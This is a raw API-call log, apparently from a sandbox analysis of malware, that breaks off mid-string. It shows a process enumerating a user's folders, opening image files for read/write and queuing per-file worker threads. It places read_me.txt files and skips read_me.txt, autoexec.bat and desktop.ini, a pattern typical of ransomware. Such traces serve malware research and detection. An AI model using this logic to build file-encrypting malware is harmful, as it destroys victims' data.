(in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46f32f80, ftCreationTime.dwHighDateTime=0x1d4c5fc, ftLastAccessTime.dwLowDateTime=0x422425c0, ftLastAccessTime.dwHighDateTime=0x1d4d567, ftLastWriteTime.dwLowDateTime=0x422425c0, ftLastWriteTime.dwHighDateTime=0x1d4d567, nFileSizeHigh=0x0, nFileSizeLow=0x1689d, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="VU VfXS6Pgn-.png", cAlternateFileName="VUVFXS~1.PNG")) returned 1 [0076.251] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VU VfXS6Pgn-.png") returned 59 [0076.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VU VfXS6Pgn-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vu vfxs6pgn-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa24 [0076.251] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 171 [0076.251] QueueUserWorkItem (Function=0x404e00, Context=0xa24, Flags=0x0) returned 1 [0076.252] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd70c2a0, ftCreationTime.dwHighDateTime=0x1d4d163, ftLastAccessTime.dwLowDateTime=0x9558c570, ftLastAccessTime.dwHighDateTime=0x1d4cf3b, ftLastWriteTime.dwLowDateTime=0x9558c570, ftLastWriteTime.dwHighDateTime=0x1d4cf3b, nFileSizeHigh=0x0, nFileSizeLow=0x883a, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="wl6j0x7NAsiYh97r.bmp", cAlternateFileName="WL6J0X~1.BMP")) returned 1 [0076.252] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wl6j0x7NAsiYh97r.bmp") returned 63 [0076.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\wl6j0x7NAsiYh97r.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\wl6j0x7nasiyh97r.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa28 [0076.252] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 172 [0076.252] QueueUserWorkItem (Function=0x404e00, Context=0xa28, Flags=0x0) returned 1 [0076.252] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5f33d00, ftCreationTime.dwHighDateTime=0x1d4c90e, ftLastAccessTime.dwLowDateTime=0x44783cd0, ftLastAccessTime.dwHighDateTime=0x1d4cb80, ftLastWriteTime.dwLowDateTime=0x44783cd0, ftLastWriteTime.dwHighDateTime=0x1d4cb80, nFileSizeHigh=0x0, nFileSizeLow=0xd8f8, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Yb9uhWzjKs-.png", cAlternateFileName="YB9UHW~1.PNG")) returned 1 [0076.252] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yb9uhWzjKs-.png") returned 58 [0076.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Yb9uhWzjKs-.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yb9uhwzjks-.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa2c [0076.252] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 173 [0076.252] QueueUserWorkItem (Function=0x404e00, Context=0xa2c, Flags=0x0) returned 1 [0076.252] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74d454f0, ftCreationTime.dwHighDateTime=0x1d4cf76, ftLastAccessTime.dwLowDateTime=0x23299a60, ftLastAccessTime.dwHighDateTime=0x1d4d251, ftLastWriteTime.dwLowDateTime=0x23299a60, ftLastWriteTime.dwHighDateTime=0x1d4d251, nFileSizeHigh=0x0, nFileSizeLow=0x2ad7, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="yHaWKp5081GLz_kNjZJN.gif", cAlternateFileName="YHAWKP~1.GIF")) returned 1 [0076.252] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yHaWKp5081GLz_kNjZJN.gif") returned 67 [0076.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\yHaWKp5081GLz_kNjZJN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yhawkp5081glz_knjzjn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa30 [0076.252] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 174 [0076.252] QueueUserWorkItem (Function=0x404e00, Context=0xa30, Flags=0x0) returned 1 [0076.252] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x519b48d0, ftCreationTime.dwHighDateTime=0x1d4cc9d, ftLastAccessTime.dwLowDateTime=0xf9b635c0, ftLastAccessTime.dwHighDateTime=0x1d4ccfc, ftLastWriteTime.dwLowDateTime=0xf9b635c0, ftLastWriteTime.dwHighDateTime=0x1d4ccfc, nFileSizeHigh=0x0, nFileSizeLow=0x8df6, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="YzAGhTzbIO6_1eDBh3V.bmp", cAlternateFileName="YZAGHT~1.BMP")) returned 1 [0076.252] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YzAGhTzbIO6_1eDBh3V.bmp") returned 66 [0076.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\YzAGhTzbIO6_1eDBh3V.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\yzaghtzbio6_1edbh3v.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa34 [0076.252] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 175 [0076.252] QueueUserWorkItem (Function=0x404e00, Context=0xa34, Flags=0x0) returned 1 [0076.252] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf966e070, ftCreationTime.dwHighDateTime=0x1d4d453, ftLastAccessTime.dwLowDateTime=0x4190b900, ftLastAccessTime.dwHighDateTime=0x1d4d07d, ftLastWriteTime.dwLowDateTime=0x4190b900, ftLastWriteTime.dwHighDateTime=0x1d4d07d, nFileSizeHigh=0x0, nFileSizeLow=0x4b85, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="_1BQUTkWpGYxe9Y8c26L.bmp", cAlternateFileName="_1BQUT~1.BMP")) returned 1 [0076.252] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_1BQUTkWpGYxe9Y8c26L.bmp") returned 67 [0076.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_1BQUTkWpGYxe9Y8c26L.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_1bqutkwpgyxe9y8c26l.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa38 [0076.253] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 176 [0076.253] QueueUserWorkItem (Function=0x404e00, Context=0xa38, Flags=0x0) returned 1 [0076.253] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4d5c0, ftCreationTime.dwHighDateTime=0x1d4d4bb, ftLastAccessTime.dwLowDateTime=0xfa90460, ftLastAccessTime.dwHighDateTime=0x1d4c790, ftLastWriteTime.dwLowDateTime=0xfa90460, ftLastWriteTime.dwHighDateTime=0x1d4c790, nFileSizeHigh=0x0, nFileSizeLow=0x88b7, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="_iThV9G.jpg", cAlternateFileName="")) returned 1 [0076.253] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_iThV9G.jpg") returned 54 [0076.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_iThV9G.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_ithv9g.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa3c [0076.253] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 177 [0076.253] QueueUserWorkItem (Function=0x404e00, Context=0xa3c, Flags=0x0) returned 1 [0076.253] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4d5c0, ftCreationTime.dwHighDateTime=0x1d4d4bb, ftLastAccessTime.dwLowDateTime=0xfa90460, ftLastAccessTime.dwHighDateTime=0x1d4c790, ftLastWriteTime.dwLowDateTime=0xfa90460, ftLastWriteTime.dwHighDateTime=0x1d4c790, nFileSizeHigh=0x0, nFileSizeLow=0x88b7, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="_ithv9g.jpg", cAlternateFileName="")) returned 0 [0076.253] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.253] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\read_me.txt") returned 54 [0076.253] GetProcessHeap () returned 0x4f10000 [0076.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.253] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 79 [0076.253] GetProcessHeap () returned 0x4f10000 [0076.253] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d810d0 | out: hHeap=0x4f10000) returned 1 [0076.253] GetProcessHeap () returned 0x4f10000 [0076.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.253] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*") returned 45 [0076.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4d5c0, ftCreationTime.dwHighDateTime=0x1d4d4bb, ftLastAccessTime.dwLowDateTime=0xfa90460, ftLastAccessTime.dwHighDateTime=0x1d4c790, ftLastWriteTime.dwLowDateTime=0xfa90460, ftLastWriteTime.dwHighDateTime=0x1d4c790, nFileSizeHigh=0x0, nFileSizeLow=0x88b7, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="_ithv9g.jpg", cAlternateFileName="")) returned 0xffffffff [0076.253] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\read_me.txt") returned 55 [0076.254] GetProcessHeap () returned 0x4f10000 [0076.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.254] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 80 [0076.254] GetProcessHeap () returned 0x4f10000 [0076.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d910d8 | out: hHeap=0x4f10000) returned 1 [0076.254] GetProcessHeap () returned 0x4f10000 [0076.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.254] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*") returned 42 [0076.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ca4d5c0, ftCreationTime.dwHighDateTime=0x1d4d4bb, ftLastAccessTime.dwLowDateTime=0xfa90460, ftLastAccessTime.dwHighDateTime=0x1d4c790, ftLastWriteTime.dwLowDateTime=0xfa90460, ftLastWriteTime.dwHighDateTime=0x1d4c790, nFileSizeHigh=0x0, nFileSizeLow=0x88b7, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="_ithv9g.jpg", cAlternateFileName="")) returned 0xffffffff [0076.254] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\read_me.txt") returned 52 [0076.254] GetProcessHeap () returned 0x4f10000 [0076.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.254] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 81 [0076.254] GetProcessHeap () returned 0x4f10000 [0076.254] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8da10e0 | out: hHeap=0x4f10000) returned 1 [0076.254] GetProcessHeap () returned 0x4f10000 [0076.254] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.254] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*") returned 47 [0076.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.254] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\.") returned 47 [0076.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.254] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\..") returned 48 [0076.254] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.254] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 57 [0076.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa40 [0076.255] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.255] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.255] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.255] CloseHandle (hObject=0xa40) returned 1 [0076.255] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cbebc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.255] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\read_me.txt") returned 57 [0076.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa40 [0076.255] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.255] CloseHandle (hObject=0xa40) returned 1 [0076.255] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cbebc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.255] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.255] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\read_me.txt") returned 57 [0076.255] GetProcessHeap () returned 0x4f10000 [0076.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.255] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 82 [0076.255] GetProcessHeap () returned 0x4f10000 [0076.255] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8db10e8 | out: hHeap=0x4f10000) returned 1 [0076.255] GetProcessHeap () returned 0x4f10000 [0076.255] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.255] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*") returned 44 [0076.255] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.256] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\.") returned 44 [0076.256] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.256] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\..") returned 45 [0076.256] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.256] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned 54 [0076.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa40 [0076.256] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.256] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.256] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.256] CloseHandle (hObject=0xa40) returned 1 [0076.256] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0076.256] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0076.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.256] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0076.256] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0076.256] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.256] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cbebc0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24cbebc0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24cbebc0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.256] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 